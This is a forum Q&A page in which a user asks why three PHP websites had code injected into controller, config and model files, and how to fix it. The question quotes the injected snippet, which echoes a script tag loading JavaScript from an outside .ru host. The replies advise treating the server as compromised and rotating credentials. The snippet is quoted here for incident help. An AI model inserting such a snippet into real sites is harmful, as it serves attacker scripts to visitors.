Alaa
Reputation: 1
How to solve code injection in PHP websites?
I have three PHP websites. Two of them in the same hosting and one in another host, the three websites had a code injection in controllers, config and model files in the same time like this
#266a81#
if(empty($nwu)) {
$nwu = "<script type=\"text/javascript\" src=\"http://allinclusivetravel.ru/w96rnjzc.php?id=1709100\"></script>";
echo $nwu;
}
I want to know the reason and the solution for that, please.
Upvotes: 0
Views: 117
Answers (2)
John Cartwright
Reputation: 5084
If they have injected code directly into your source files, your host account or server has been compromised. Changed all your credentials, SSH keys, etc, and contact your hosting immediately.
You will have to manually removed all the code they injected.
Upvotes: 1
Scream
Reputation: 100
Maybe I did not understand, you have to remove the tag? If so, you can try this: remove script tag from HTML content
Upvotes: 0
Related Questions
- Injection hack php exploit information
- How to prevent code injection attacks in PHP?
- Best way to avoid code injection in PHP
- Detecting HTML Code Injection
- Code injection with PHP
- PHP Injection Attack - how to best clean up the mess?
- How to prevent user generated faults?
- PHP Code Injection
- Data inserted in Website - security issue
- How to avoid "PHP injection"